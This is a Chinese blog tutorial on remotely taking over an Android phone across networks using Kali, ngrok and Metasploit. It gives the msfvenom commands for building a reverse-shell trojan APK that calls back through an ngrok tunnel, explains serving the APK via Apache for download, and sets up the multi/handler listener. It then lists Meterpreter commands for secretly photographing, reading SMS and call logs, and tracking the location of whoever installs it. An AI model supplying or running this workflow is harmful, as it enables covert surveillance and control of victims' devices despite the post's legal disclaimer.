Kali初讲——非局域网下入侵手机

kali初讲——入侵手机

导论

学习此教程需遵守《中华人民共和国信息安全法》

所有教程仅用于信息安全测试,且在授权的情况下进行,请勿用于其他用途!
网络安全学得好,牢饭吃的饱不提倡啊!

一、Kali

kali linux操作系统是一款集成黑客工具的linux操作系统,为网络安全业内人员常用的操作系统。其中包含nmap,msf等工具,我们常用的其实就是msf集成测试工具以及nmap扫描工具等。
在这里插入图片描述
kali操作系统内集成了很多渗透测试工具,让业内的渗透测试测试工程师可以使用一个操作系统就可以使用很多的测试工具,其中包含,漏洞扫描工具,漏洞利用工具,提权工具,爆破字典生成工具等。
使用教程必须在VM或者其他虚拟机中安装该操作系统。当然双系统也是可以的,但是初学者,不建议这样做,因为安装过程中电脑会出现各种问题。
过几天可能我会单独出一个windows操作系统双系统教程。
在这里插入图片描述

二、Android

Android系统就不用说了,应该大多人使用的都是Android操作系统的手机。
Android操作系统是google公司开发的一套适用于手机的操作系统,其实从本质上来讲,其实Android操作系统的本质其实是linux操作系统,只不过其中内置的一些东西被google公司修改或者删除了,变为了面向手机用户的操作系统。
在这里插入图片描述

我们在国内所能看到的手机,除华为“鸿蒙”操作系统之外,手机的操作系统几乎都是基于google的android操作系统修改的,小米的miui,oppo的ColorOS,vivo的OriginOS等。
该教程是基于Android操作系统进行测试,当然,理论上来讲其他操作系统貌似也是可以的。苹果的操作系统理论上可以,但是首先你得能将病毒安装到人家操作系统才行,不然你生成木马有啥用呢,这也是苹果操作系统安全的原因之一。
这里事实上应该使用外网或者其他局域网上的一台手机进行测试,但是为了方便实现,我使用了模拟器——“夜神模拟器”。
在这里插入图片描述

三、ngrok

ngrok可以理解为一个像隧道一样的东西,他提供的就是两个在不同局域网下面的两个网络可以访问。
假设我们在存在A,B两个不同的局域网,正常情况下,我们在A局域网下是不可以访问B的,但是ngrok提供了一个公网链接,让A,B两个局域网可以相互访问。
原理其实就是从A局域网发送的数据,ngrok提供代理链接,通过该外部代理A,B两个局域网发送数据,传输数据。

安装ngrok

3.1注册ngrok

ngrok的官方网址为:ngrok官网
下面这个为登录后的界面,使用ngrok需要先使用邮箱进行注册。
在这里插入图片描述

3.2下载ngrok

从登录后的界面可以看到ngrok包含linux版本,mac OS版本,Windows版本以及另外一个笔者也不清楚的版本。
笔者这里下载的是linux版本。

在这里插入图片描述

3.3kali安装ngrok

ngrok的官网为我们提供了安装教程,我们需要做的就是照着去输入命令就好了,需要注意的是,ngrok的安装位置。
在这里插入图片描述
登录界面可以看到,ngrok的安装就是两步,把下载到的ngrok解压,然后将自己的身份验证码添加到配置文件中,linux中一切皆文件。

3.4直接下载ngrok到kali

没啥难度,就在kali下面直接访问ngrok的官网就好了。但是kali系统可能会出现权限不够问题。故,下载的ngrok的时候我们直接将其下载到系统默认的下载位置,即:/home/username/下载。
和windows的下载差不多,就不详细讲解了

3.5开始安装ngrok

打开kali的终端,进入超管权限(root)

进入root权限:sudo -i
然后提示输入密码,输入系统登录密码,这里不会显示密码。
输入完成直接回车。
出现类似如下情况,代表进入root权限。
切换到根目录:cd /

在这里插入图片描述
切换到ngrok保存的位置,默认应该是在:/home/username(自己的用户名)/下载

切换命令:cd /home/username/下载
username对应你自己的用户名
列出当前目录下的文件:ls

现在我们已经找到ngrok的下载地址了,然后我们将其移动或者复制到我们自己建立的位置,保证自己以后使用能找得到。
返回根目录在,根目录下建立一个名为“ngrok”的文件夹

返回根目录:cd /
创建文件夹:mkdir ngrok

在这里插入图片描述
笔者这里是在根目录下建立了一个专门存储文件的文件夹——Heak,然后又在下面建立了ngrok文件夹,不影响使用,自己找得到就好了。
将ngrok移动/复制到自己建立的文件夹。
回归话题,我们已经在根目录下面建立了一个名为ngrok的文件夹,文件绝对路径为:/ngrok

终端下切换目录位置:cd /home/username(自己用户名)/下载
pwd:确定当前文件绝对路径,ls:列出当前目录下的文件。
复制ngrok下载文件:cp ngrok.zip(文件名) /ngrok
移动ngrok下载文件:mv ngrok.zip /ngrok

现在ngrok的文件在:/ngrok下面存在。我们直接切换到ngrok目录下:

切换目录:cd /ngrok
绝对路径切换,所以在哪里,都可以直接切换到该目录下

在这里插入图片描述
解压ngrok文件:

解压zip文件命令为:unzip 文件名
当前使用:unzip ngrok.zip

解压完毕,添加自己的身份验证码到配置文件

ngrok config add-authtoken 自己的身份验证码
在ngrok登录地址里面都有,不过需要注意一点,输入这串命令的前提是,解压没有出错,且档当前目录为
ngrok解压后得到的文件目录。

在这里插入图片描述
至此,安装完毕。

ngrok的start

使用ngrok需要保证ngrok所在的位置
启动ngrok:ngrok http 80

在这里插入图片描述

四、msf

msf工具是非常强大的,每个渗透测试人员都会使用到的工具,其中内置的当前发现的各个平台系统漏洞,以及漏洞相对应的利用模块,攻击载荷(payload)。
在这里插入图片描述

使用metasploit也就是msf中的msfvenom生成远程控制木马,包括windows的.exe文件,Android的apk文件等,这貌似没啥好说的。
实际使用的时候根据不同的系统,使用不同的生成参数即可生成不同平台的木马文件,当然直接生成的木马文件是会被检测到的。
当然,我们也可以让他检测不到:“木马加壳技术”,这里不做说明。
使用metasploit生成远程控制apk文件。

生成apk文件:
msfvenom -p android/meterperter/reverse_tcp lhost=攻击者ip lport=监听端口 >FileName.apk
生成exe文件:
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者ip lport=监听端口 -f exe > FileName.exe

反向tcp连接
其他的metasploit没啥好说的。
metasploit的功能太多了,笔者也还在学习中。

五、Apache

apache为kali中内置的一个服务器软件,主要用于简历一个可供访问的网络站点,我们为模拟真实的攻击场景,将msf生成的木马上传到apache服务器,然后提供一个可以下载的链接。
然后Android模拟去下载apache服务器上的apk文件,然后去安装。已达到真实的模拟效果。
apache在kali中默认是关闭的,我们需要提供访问的话,需要开启。
开启apache服务的命令为:service start apache2
关闭apache服务的命令为:service stop apaqhe2
重启apache服务的命令为:service restart apache2
查看apache服务开启状态的命令是:service status apache2
在查看apache服务开启状态中出现:active即为apache服务已经开启。
apache关闭状态
在这里插入图片描述
apache开启状态
在这里插入图片描述

六、apk

apk文件这个没啥好说的,其实就是android系统可安装软件的后缀。
使用metasploit生成apk文件后,我们将其上传到apache服务器下,模拟实际下载。

apache服务器文件位置:/var/www/html

当然,可以去某平台买个服务器,自己搭建个小型站点,具体不详述了。
笔者这里不进行模拟,直接将木马安装至手机(android)。

七、start

1-6步为前期准备,准备好之后就开始进行模拟了。

前期准备:
vm虚拟机
kali操作系统
android手机(公网或者其他局域网)
ngrok(注册代理链接)
apache(网站模拟)
linux服务器(更加真实场景模拟)
VScode(这个可以写一个网站,真实)

7.1启动ngrok

ngrok提供外网代理

开启ngrok:
打开终端,进入root模式:sudo -i
进入ngrok文件下:cd /ngrok
启动ngrok:./ngrok tcp 端口号
笔者这里使用端口为:4444
则命令为:./ngrok tcp 4444

在这里插入图片描述

这里得到:tcp://0.tcp.ap.ngrok.io:14265
0.tcp.ap.ngrok.io:网址
14265:端口号

7.2metasploit生成木马

启动msfconsole:

终端输入:msfconsole

启动后如下类似。
在这里插入图片描述

生成apk木马文件:
msfvenom -p android/meterperter/reverse_tcp lhost=攻击者ip lport=监听端口 >shell.apk
具体使用:
msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ap.ngrok.io lport=14265 >shell.apk

我们得到一个名为shell.apk的安装包
在这里插入图片描述

7.3安装shell

直接将该shell安装到手机,或者模拟器,笔者使用模拟器。

在这里插入图片描述

7.4kali开启监听

打开metasploit

终端输入:msfconsole

进入metasploit

七、exploit

黑客的终极操作
我们既然有了shell脚本,我们需要监听是否有人点击了这个脚本,那我们就需要设置监听

输入:use exploit/multi/handler
进入监听
再输入:show options
查看需要设置的参数:
一般三个参数:payload,lhost,lport
set payload android/meterperter/reverse_tcp
设置反弹shell,其实就是设置你的木马利用方式
set lhost 192.168.200.134
设置监听的反弹ip,因为是具ngrok映射,这里设置为:0.0.0.0
set lport 9999
设置监听端口,简单地说,就是监听木马被点击回传的端口,及上述生成木马的端口:4444
(这里因为使用了ngrok代理,上述设置的ngrok的代理端口为4444,如果使用Linux服务器及设置为木马的生成时设置的端口)
设置完毕,开始监听:run 

在这里插入图片描述

八、happy

如果有人点击了你生成那个木马,后台就会:
在这里插入图片描述
出现上述显示,即代表你远控成功,你可以进行如下操作:

1.查看对方手机系统信息
命令: sysinfo
2.查看对方手机安装的app文件
命令: app_list
3.远程控制对方手机拍摄一张照片
命令: webcam_snap
4.远程控制对方手机开起视频聊天
命令: webcam_chat
5.实时查看对方手机的信息
命令: dump_sms
6.获取对方手机的通讯录
命令: dump_calllog
7.实时获取对方手机GPS定位
命令: geolocate
8.更多命令
还可以查看帮助文档,命令help
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值